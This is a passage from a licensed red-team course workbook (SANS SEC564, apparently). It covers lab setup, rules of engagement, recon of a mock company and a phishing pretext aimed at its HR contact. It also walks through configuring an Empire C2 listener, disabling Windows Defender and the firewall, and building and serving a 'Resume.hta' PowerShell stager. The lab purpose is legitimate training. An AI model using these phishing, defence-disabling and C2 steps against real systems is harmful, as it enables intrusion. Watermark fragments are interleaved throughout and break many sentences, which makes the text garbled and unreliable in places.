The process for configuring this depends on the version of VMware you are using.  This workbook includes  details for configuring VMware Player, followed by VMware Workstation, and finally VMware Fusion for  Mac.  Flip forward to the appropriate version of VMware and follow the directions for configuring bridged  networking. Make sure you do this for both Slingshot and Windows VMs. 

nm

VMware Player Bridged Networking Configuration

ak

er

@ ya

ho

22829180 i< an

If you are using VMware Player (VMware Workstation and VMware Fusion are covered below), with your  Slingshot image booted, go to the top of your VMware screen and select PlayerManageVirtual  Machine Settings. 

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   Click on “Network Adapter” near the middle of the screen. 

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-2

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180

 

nm

ak

er

Confirm that “Connected” and “Connect at power on” are selected, that the radio button for “Bridged” is  selected, and that the “Replicate physical network connection state” is checked. 

i< an

Click on the “Configure Adapters” button. 

Lincoln Mazzei nc o

ln

M

az

ze

Deselect all network adapters except your Wireless interface.  Only your Wireless adapter should be  checked and that all other interfaces are unchecked.  Different computers will have different names for  the Wireless interface, so select the one that most likely matches your Wireless interface.  Your other  adapters should be deselected to force VMware to use your wireless adapter.  Finally, click OK and OK again to close the configuration windows. 

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

VMware Workstation Bridged Networking Configuration

ce

ns

ed

If you are using VMware Workstation (not Player) to bridge to your Wireless interface for in‐classroom  SANS training, please follow these steps. 

Li

With the VMs booted up, at the top of the VMware screen, select EditVirtual Network Editor. 

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-3

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268  

Near the bottom of the screen, click on the “Change Settings” button.  A UAC dialog box may prompt you  to accept the change.  Please click “Yes” to do so.  

Ap ril

[email protected] m

>

VMnet0 interface is highlighted at the top of the screen. 

o.

co

Near the center of the screen, ensure that the radio button is set for “Bridged,” and click on the drop‐ down menu where it says “Automatic” and change it to choose your Wireless interface. Different  computers will have different names for the Wireless interface, so select the one that most likely matches  your Wireless interface.  

er

@ ya

ho

22829180 i< an

nm

ak

At the bottom of the screen, click on “Apply” and then on “OK” to close the configuration screen. 

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live       SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-4

© SANS Institute 2020

VMware Fusion Bridged Networking Configuration

If you are using VMware Fusion for Mac, to bridge to your Wireless interface for in‐classroom SANS  training, please follow these steps.  With the Slingshot virtual machine booted up, go to the Mac menu bar within Fusion and select Virtual  MachineNetwork AdapterNetwork Adapter Settings…. 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180  

ze

Lincoln Mazzei M

az

Confirm that “Connect Network Adapter” is checked. 

nc o

ln

Near the middle‐left part of your screen, in the section under “Bridged Networking,” click the radio button  corresponding to your wireless adapter.  

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-5

© SANS Institute 2020

Once you’ve selected the radio button associated with your network adapter, you may be prompted for a  password. Submit the password, click OK, and close the Network Adapter Window. 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268  

[email protected] Ap ril

Special Note for Remote Students (SANS OnDemand, vLive, or Simulcast Students) 

You’ll need to set up your Slingshot Linux virtual machine and Windows virtual machine so that they  both can access the internet. Both machines must be able to reach an internet destination such as  www.sans.org.  In VMware, please use bridged networking, and configure your machine(s) with an IP addresses that  matches your environment. For the purposes of this course, it's normally simplest to use DHCP.  Download the OpenVPN certificates from connect.labs.sans.org  Your OpenVPN key (.ovpn file) will  have a filename that is unique to your SANS account.  In Windows, put your certificates in the C:\Program Files\OpenVPN\config directory and start  OpenVPN with Administrator privileges.   Establish an OpenVPN connection from Windows by right‐clicking the OpenVPN icon in your  tool tray (bottom right) and selecting Connect.    In Slingshot Linux, place your downloaded certificates in the /etc/openvpn directory.   Establish the VPN connection in Slingshot Linux  by running:  # openvpn --config /etc/openvpn/SEC564-*.ovpn When both Windows and Slingshot Linux can ping 10.0.0.1, they are configured properly for the lab  exercises. 

o.



co

m

>

OLT (Online Training) students can access My Labs by signing in to sans.org and viewing the Account  Dashboard screen. Under My Online Training, select My Labs and follow the on‐screen instructions. 

er

ak

Lincoln Mazzei



nc o

ln

M

az

ze



nm



i< an



@ ya

ho

22829180

ed

ce

ns



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Note: For all networked labs, please use the IP address assigned to the OpenVPN interface by the DHCP server  (10.0.0.X) across the VPN in the virtual lab. This IP address is viewable via the OpenVPN tool tray client in  Windows and as the tap0 network interface displayed by the ifconfig tap0 command in Slingshot Linux.  

live

IMPORTANT NOTE: For all labs that use the tcpdump sniffer, specify the tap0 network interface at the  command line using the ‐i option as follows:  # tcpdump -i tap0 -nn

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-6

© SANS Institute 2020

Boot and Document your Linux IP Address

4. Boot your Slingshot Linux guest system.  If VMware prompts you about whether you “moved” or “copied” this virtual machine, select “I copied  it.” If it doesn’t prompt you, that’s OK. This is important to reset unique items like MAC Addresses. 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] ho

22829180 @ ya

 

 

 

ak

er

5. When prompted, log in to the guest machine using the following credentials: 

Password = sec564 

i< an

nm

Username = sec564 

Lincoln Mazzei nc o

ln

M

az

ze

6. Open a Terminal and elevate privileges: 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live  

 

$ sudo su SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-7

© SANS Institute 2020

We have configured the sec564 account to su to root without providing a password.  You should now see  the # prompt. 

090aff33bcb6e401ded410120bc9a268  

26 ,2 02 0

7. Change root's password to a value you'll remember but that isn't easily guessed or cracked. We'll be  connected to a network with other students in this course, and you do not want them to know the  password for your Linux image. 

[email protected] Ap ril

# passwd

m

>

Enter your chosen password twice to set it. 

o.

co

8. Change the password for the sec564 accounts:  # passwd sec564

@ ya

ho

22829180 i< an

nm

ak

er

9. ONLY FOR IN CLASS STUDENTS. Remote students, please skip to the next step.    In your Linux guest virtual machine, set the IP address by editing a file, which you can access by running  this command (at a root‐level shell with a # prompt): 

Lincoln Mazzei ze

# gedit /etc/network/interfaces

ln

M

az

Inside the file, find the section under auto eth0 and make the following changes; the X will be your student  number provided by the in‐person SEC564 Instructor: 

nc o

auto eth0 iface eth0 inet static address 10.0.0.2XX  X is your student number provided by the Instructor netmask 255.255.255.0 gateway 10.0.0.1 dns-nameservers 10.0.0.1

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Save the file by clicking the “Save” button near the top of the screen and exit the gedit tool with the X: 

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-8

© SANS Institute 2020 090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Set your IP address for eth0 to 10.0.0.X, where X was provided by your instructor and netmask to 255.255.255.0

[email protected] Ap ril

 

m

>

Flush your previous network configuration and then restart your network interface to apply the changes: 

o.

co

# ip addr flush eth0 # service networking restart

@ ya

ho

22829180 er

10. Document the IP Address of your Linux slingshot: 

nm

ak

# ifconfig

i< an

Your IP address in the output of this command for eth0 (for live students) or tap0 (for remote students)  should be 10.0.0.X   X is a variable for your Linux IP 

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

 

ce

Boot and Document your Windows IP Address

Li

11. Boot your Windows VM. When prompted, log in to the guest machine using the following credentials:  Username = sec564 

live

Password = sec564  12. Change the password of the sec564 user to a value you'll remember but that isn't easily guessed or  cracked.  

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-9

© SANS Institute 2020

Press Ctrl-Alt-Insert on your virtual machine and Click Change Password You may also go to VM – Send Ctrl+Alt+Del   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]  

@ ya

ho

22829180 nm

ak

er

  13. Verify your configuration and make sure you have connectivity between the two guest systems. We'll start  from Windows and then work our way to Linux. 

i< an

In Windows, open an elevated command prompt: 

Lincoln Mazzei ze

Click Start and Type cmd

nc o

ln

M

az

Right click “Command Prompt” and select “Run as administrator”

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live Next, check your IP address for your Local Area Connection:  C:\> ipconfig SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-10

© SANS Institute 2020

Write your Windows IP address down for future reference; we will reference it as 10.0.0.W  W is a  variable for your Windows IP  Turn off your firewall:  C:\> netsh advfirewall set allprofiles state off

090aff33bcb6e401ded410120bc9a268 From Windows, try to ping Linux: 

26 ,2 02 0

C:\> ping 10.0.0.X  X is a variable for your Linux IP Then, in Linux, ping your Windows host: 

[email protected] Ap ril

# ping 10.0.0.W  W is a variable for your Windows IP

 

o.

 

co

m

>

If you see ping responses from Windows to Linux and from Linux to Windows, you are configured and  ready for the labs. If not, ask the instructor for assistance. 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-11

© SANS Institute 2020

Read and understand the Scope and Rules of Engagement

The Scope and Rules of Engagement establish the objective, scope, responsibility, relationship, and guidelines  between the customer (SEC564 Target) and testing firm (SEC564 Students) and any stakeholders (SEC564  Instructor) required for Red Team Adversary Emulation Exercise execution. 

090aff33bcb6e401ded410120bc9a268 Objective

[email protected] Ap ril

Scope

26 ,2 02 0

The objective of this Red Team Exercise is to emulate APT33/Elfin and attempt to gain full access/control of  SEC564 Target network to mount supply chain attacks against their customers. The engagement should focus  on testing the effectiveness of controls SEC564 Target has implemented and its exposure to similar adversary  attacks. Red Team should test the people, process, and technology to obtain a holistic view of SEC564 Target  security posture. 

o.

co

m

>

This will be a blackbox test for the Red Team and a blind test for SEC564 Target. The scope of this engagement  is the SEC564 Target DMZ and Internal Network. The following is allowed but should not be limited as long as  Rules of Engagement is met: 

22829180

Social Engineering 



Client‐Side Attacks and Exploitation 



Server‐Side Attacks and Exploitation 



Privilege Escalation Attacks 



Web Application Attacks 



Lateral Movement within the two specified networks 



Credential Attacks 

i< an

nm

ak

er

@ ya

ho



nc o

ln

M

az

ze

Lincoln Mazzei Attackers 10.0.0.1/24

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

TargetDMZ 172.16.0.1/24

TargetLAN 192.168.5.1/24

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

 

Licensed To: Lincoln Mazzei April 26, 2020

1.2-12

© SANS Institute 2020

Rules of Engagement



No denial‐of‐service attacks 



No performance‐hogging attacks on SEC564 Target systems 



No disruption of lab elements  o Don’t change passwords or flags  o Don’t stop services or harden systems 

090aff33bcb6e401ded410120bc9a268 No attacking other students (10.0.0.0/24) 

Breaking these rules may result in the student being asked to leave the class.  Points of Contact

26 ,2 02 0



[email protected] m

>

Ap ril

The SEC564 Instructor will be the Red Team’s point of contact. Please notify the instructor of any concerns  with the SEC564 Target network. Likewise, the SEC564 Instructor will notify the Red Team if scheduled  maintenance, reboots, or outages are experienced.  

co

Communication Plan

o.

Debrief schedule: Daily at 4:30 p.m. 

@ ya

ho

22829180

Out of scope areas/assets

nm

ak

er

The “Attacker Network” is out of scope: 10.0.0.0/24

i< an

Conclusion 

In this lab, you have extracted and configured the Slingshot Linux Virtual Machine (VM) image for the SEC564  course.  This image includes tools that will be used to emulate APT33/Elfin against SEC564 Target. The attack  infrastructure setup has begun and network connectivity in the “Attacker Network” has been confirmed. 

az

ze

Lincoln Mazzei nc o

ln

M

The scope and rules of engagement have been defined, and you may begin to perform the Red Team Exercise  if you wish to go on your own.   

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-13

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

er

@ ya

ho

22829180 i< an

nm

ak

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

Lab 1.3: Recon and Social Engineering Objectives 

090aff33bcb6e401ded410120bc9a268   

Perform reconnaissance by analyzing SEC564 Target website  Identify who to target for Social Engineering  Plan social engineering attack that emulates APT33/Elfin 

26 ,2 02 0

  This lab will focus on the Testing Phase of a Red Team Adversary Emulation Exercise where the Red Team  performs Reconnaissance and prepares for Social Engineering.  

co

m

>

Ap ril

[email protected] o.

Threat  Intelligence

Closure

i< an

nm

ak

er

@ ya

ho

22829180 Testing

Planning

nc o

ln

M

az

ze

Lincoln Mazzei Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ed

To :

 

ns

TTPs Emulated in this Lab 

 

Li

ce

T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1204 – User Execution: Malicious HTML application delivered via spear phishing emails   

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.3: Recon and Social Engineering

Licensed To: Lincoln Mazzei April 26, 2020

1.3-1

Lab Setup 

© SANS Institute 2020

In this lab, you will think creatively like an adversary to create a social engineering attack resulting in user  execution. APT33/Elfin use spear phishing with attachments to trick the victim to execute code on their behalf.  You will need to perform reconnaissance on the SEC564 Target website to learn more about the target and  come up with ideas for social engineering. In particular, how to get a SEC564 Target to open your email and  click on a link for a .hta file.    Ensure that you can access the SEC564 Target website from the Slingshot Linux VM:    http://www.sec564target.com/

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected]

Lab – On Your Own 

o.

co

m

>

Ap ril

Perform reconnaissance to plan a social engineering attack against SEC564 Target to accomplish the Initial  Access TTPs:    T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1204 – User Execution: Malicious HTML application delivered via spear phishing emails    Who will you target?  _____________________________________________________________________________________    What is/are their email address(es)?  _____________________________________________________________________________________    What is the SEC564 Target email address syntax?  _____________________________________________________________________________________    Can you guess other possible email addresses?  _____________________________________________________________________________________    What pre‐text will you use?  _____________________________________________________________________________________    _____________________________________________________________________________________    _____________________________________________________________________________________    _____________________________________________________________________________________    What technical information can you obtain about SEC564 Target?  _____________________________________________________________________________________    _____________________________________________________________________________________    Review the Solution section when complete.   

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.3: Recon and Social Engineering

Licensed To: Lincoln Mazzei April 26, 2020

1.3-2

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

1. Start by visiting and reading the SEC564 Target Website from either Windows or Linux VM:    http://www.sec564target.com   2. Review the “Our Team” page:    http://www.sec564target.com/team.html   Note the names of the leadership team and their roles.    3. Review the “Services” page:    http://www.sec564target.com/services.html   4. Review the “Careers” page    http://www.sec564target.com/careers.html     Identify the open position.      Identify the email address to send resumes.      Identify the email syntax for SEC564 Target.      What other email addresses can be derived?    5. Review the “Contact Us” page    http://www.sec564target.com/contact.html

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

6. Continue to explore the site and answer the questions on the previous page. You may look ahead for some  possible answers and ideas on the following page.     

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.3: Recon and Social Engineering

Licensed To: Lincoln Mazzei April 26, 2020

1.3-3

Solution

© SANS Institute 2020

Find some possible answers to questions on page 3:    Who will you target?       Dani from HR    What is/are their email address(es)?        [email protected]    What is the SEC564 Target email address syntax?      [email protected]    Can you guess other possible email addresses?      [email protected][email protected][email protected]     What pre‐text will you use?    Send Dani an email as a potential candidate for the System & Network Administrator position    Dear Dani,    I am very interested in the position available at SEC564 Target. Please find a link to my  interactive resume. I look forward to the position and hearing from you soon.    Best Regards    What technical information can you obtain about SEC564 Target?      Windows 10; Windows Server 2016; Active Directory; IIS web servers; Windows Defender 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

Bonus 

Li

ce

Following the Rules of Engagement and Scope, scan the target site and known infrastructure for any web or  network vulnerbailities. Document any artifacts and findings. 

live

Conclusion 

In this lab, you gathered information about SEC564 Target, the employees, the open positions, and some  technical information about the infrastructure. These steps will be critical for delivering successful social  engineering attacks that result in the end user (target) executing your payload and gaining initial access.    SEC564 - © 2019 Jorge Orchilles

Lab 1.3: Recon and Social Engineering

Licensed To: Lincoln Mazzei April 26, 2020

1.3-4

© SANS Institute 2020 Lab 1.4: C2 and Weaponization

Objectives 

090aff33bcb6e401ded410120bc9a268 Review the Operational Security (OpSec) features of Empire  Create a listener on Empire  Create stager payloads for your Empire listener  Execute the stager payload on your Windows VM  Observe beacon behavior  Bonus: Create and test other stager payloads 

26 ,2 02 0

     

[email protected] o.

co

m

>

Ap ril

  This lab will focus on the Testing Phase of a Red Team Adversary Emulation Exercise where the Red Team  prepares a Command and Control listener and creates stager payloads to connect to the listener.  

@ ya

ho

22829180

Threat  Intelligence

i< an

nm

ak

er

Closure

az

ze

Lincoln Mazzei Planning

nc o

ln

M

Testing

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

 

TTPs Emulated in this Lab 

live

T1043 – Commonly Used Port: Port 80 and 443   T1071 – Standard Application Layer Protocol: HTTP and HTTPS  T1086 – PowerShell: To download files from the C2 server and run various scripts   T1132 – Data Encoding: Base64  to encode command and control traffic  T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1204 – User Execution: Malicious HTML application delivered via spear phishing emails  T1480 – Execution Guardrails: Kill dates in payload to guardrail execution    SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-1

Lab Setup 

© SANS Institute 2020

Ensure that you can ping from the Slingshot Linux VM to the Windows VM and vice versa for this lab.    # ping 10.0.0.W  Your Windows IP c:\> ping 10.0.0.X  Your Linux IP

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Disable any endpoint security on Windows

1. Disable Windows Defender on your Windows VM. Although Defense Evasion is included as part of this  course, we want to introduce Empire C2 and stagers first without having to get around endpoint controls.  To achieve the goal of this lab, we need to disable it.    On Windows VM, open an administrative PowerShell command prompt:    Click the Start Menu – type PowerShell   Right Click and select Run as Administrator:  

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180 ze

Lincoln Mazzei ln

M

az

 

nc o

  Agree to the UAC prompt:   

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

    Then type the following:    PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true  

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

 

1.4-2

© SANS Institute 2020

Lab – On Your Own 

Create an Empire listener and stager payload emulating APT33/Elfin as per the previous labs:    T1043 – Commonly Used Port: Port 80 and 443   T1071 – Standard Application Layer Protocol: HTTP and HTTPS  T1086 – PowerShell: To download files from the C2 server and run various scripts   T1132 – Data Encoding: Base64  to encode command and control traffic  T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1204 – User Execution: Malicious HTML application delivered via spear phishing emails  T1480 – Execution Guardrails: Kill dates in payload to guardrail execution 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268  

Test the stager payload against the Windows VM to ensure communication works properly.    Leave the Windows agent running as it will be used for testing other actions before trying them on the  target system.    Review the step by step when complete and attempt the Bonus steps if time permits. 

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-3

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

2. On your Linux VM, open a terminal and generate new certificates for HTTPS:  $ sudo /opt/empire/setup/cert.sh   Launch Empire by running the following command: 

090aff33bcb6e401ded410120bc9a268 $ sudo empire

26 ,2 02 0

  On launch, Empire tells you the number of modules it has available, the number of active listeners, and the  number of agents associated with it.   

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

M

az

ze

Lincoln Mazzei nc o

ln

 

Start by looking at a list of commands available in the Empire framework:    (Empire) > ?

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

  3. Configure a listener:     To get to the listeners menu and see a list of current listeners, type the following command:  (Empire) > listeners   As you have not configured a listeners yet, you will see a red message stating “[!] No listensers currently  active.” Notice that your prompt has changed into the “listeners” context, allowing us to configure and  start a listener that will wait for callbacks from Empire agents.    Review the various types of listeners:    (Empire: listeners) > uselistener  Type a space after the command and hit Tab‐Tab

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-4

© SANS Institute 2020

Press   to show all the options 

To emulate the adversary TTPs as per the Threat Intelligence, choose “http” as the listener:    (Empire: listeners) > uselistener http    Type “info” command to see all description and options available for this type of listener:    (Empire: listeners/http) > info   Review all the options; some are related to Operational Security (OpSec), Defense Evasion, and Command  and Control best practices. Set the respective ones as per the Threat Intelligence: 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

Ap ril

[email protected]

 

>

ProxyCreds: If the target environment has an outbound HTTP/HTTPS proxy that requires  authentication, they may be set here.     KillDate: Set the date for the listener to exit, set this to the day after class ends in the event you  cannot cleanup before the end of the class (this is a good practice): 

ho

22829180 @ ya



o.

co

m



er

(Empire: listeners/http) > set KillDate 12/12/2020  Day after class is over 

ak

 

DefaultDelay: Set to the default of 5 which means that agents will send an HTTPS request  (beacon) to a listener every five seconds. This is ideal for the lab environment and can be  changed based on short haul and long haul requirements as discussed in the courseware. 



DefaultLostLimit: Set the number of missed checkins before the agent exits out. Set this to 0 as  the KillDate was set as a precaution: 

i< an

nm



Lincoln Mazzei ln

M

az

ze

 

nc o

(Empire: listeners/http) > set DefaultLostLimit 0    

WorkingHours: Limit the times the agents beacon to the listener to match the working hours of  the target organization. Pay close attention as the target may be in a different time zone. These  times are relevant to the target.  



DefaultProfile: Allow you to emulate the adversary more accurately, evade detection, or blend  in with a widely‐used application on the target environment. Jeff Dimmock has an excellent  write‐up: https://bluescreenofjeff.com/2017‐03‐01‐how‐to‐make‐communication‐profiles‐for‐ empire/ Examples: https://github.com/EmpireProject/Empire/tree/master/data/profiles 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

  

Host: Set the IP and port for staging (this could be a hostname or domain, but that is not  configured for this lab environment):    (Empire: listeners/http) > set Host https://10.0.0.X:443  Your Linux IP 

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-5



© SANS Institute 2020

CertPath: Set the path for where the certificate was generated from step 1 of this lab; note that  a real certificate for a hostname may be purchased and used:    (Empire: listeners/http) > set CertPath /opt/empire/data/    DefaultJitter: Jitter is the variation on the check‐in time. The higher the jitter the higher the  time variation between check ins, meaning they’re less constant. Per definition, jitter is any  variation on a certain type of interval. Set the jitter to 50%:      (Empire: listeners/http) > set DefaultJitter 0.5    UserAgent: Set the user agent that will be used to appear like the target web browser. This  should be obtained during recon.     StagingKey: Set a different key to encrypt communication between the agents and listener. Do  not use the default StagingKey as it would allow someone who intercepts the traffic to decrypt  it or even highjack one of our agents. Configure a custom staging key by using a secret value:    (Empire: listeners/http) > set StagingKey Y0urSecr3tK3y  Change  Y0urSecr3tK3y to your own unique string. Note: Empire will Base64 encode the string if it is not 32  characters, and it will show you a warning that it did so:   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

nm

ak

er

@ ya

ho

22829180

  

 

i< an

BindIP: Set to your Linux VM IP Address:    (Empire: listeners/http) > set BindIP 10.0.0.X   Your Linux IP      Port: Set the port to HTTPS default to blend in and emulate the adversary:    (Empire: listeners/http) > set Port 443

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK 

Li

ce

ns

ed

To :

StagerURI: Set the stager URL to something common:    (Empire: listeners/http) > set StagerURI /download/    Review the options:    (Empire: listeners/http) > info

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-6

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

nm

ak

er

@ ya

ho

22829180 i< an

 

  With the listener configured, launch it:    (Empire: listeners/http) > execute

 

nc o

ln

M

az

ze

Lincoln Mazzei

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

  Now, we can check out our listener by running the “list” command:    (Empire: listeners/http) > back    (Empire: listeners) > list

live

 

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-7

© SANS Institute 2020 090aff33bcb6e401ded410120bc9a268   

 

26 ,2 02 0

To see that the listener is actually a web server, move over to your Windows VM, and launch a browser to  visit the URL. Note you will have to accept the invalid certificate warning:    https://10.0.0.X  Your Linux  IP

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

    4. Create and deploy an agent with the “usestager” command. To see the different kinds of stagers available  to load an agent on the victim machine, do the following:    (Empire: listeners) > usestager   Type a space after the command and hit Tab‐Tab.   

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-8

© SANS Institute 2020

Press   to show all the options 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

    For this step, we want to test our listener, connectivity, and execution against your Windows VM.     Create a stager that runs an agent via PowerShell from a Windows HTA file:    (Empire: listeners) > usestager windows/hta

Ap ril

[email protected] >

 

o.

co

m

Review the default configuration of the stager that will load the agent:    (Empire: stager/windows/hta) > info   For this lab, keep most of the defaults for the stager. Notice Base64 encoding is enabled.    You only need to set the listener and output file:    (Empire: stager/windows/hta) > set Listener http

nm

ak

er

@ ya

ho

22829180 i< an

 

Lincoln Mazzei nc o

ln

M

az

ze

(Empire: stager/windows/hta) > set OutFile /tmp/Resume.hta     Generate your stager file:    (Empire: stager/windows/hta) > generate  

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

 

 

Use the “back” command to get back to the main Empire console:    (Empire: stager/windows/hta) > back   5. Host the stager via a web server from your Linux VM:    SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-9

© SANS Institute 2020

At a separate Linux terminal, move into /tmp and serve up the stager via the SimpleHTTPServer python  module, listening on TCP port 8080:    # cd /tmp # python –m SimpleHTTPServer 8080

  6. From your Windows VM, open a web browser and surf to:    http://10.0.0.X:8080  Your Linux  IP   Click and Open the stager payload file you created (called Resume.hta): 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

az

ze

Lincoln Mazzei

 

nc o

ln

M

  Click Open on the prompt depending on IE or Chrome: 

Li

ce

ns

ed

To :

Li

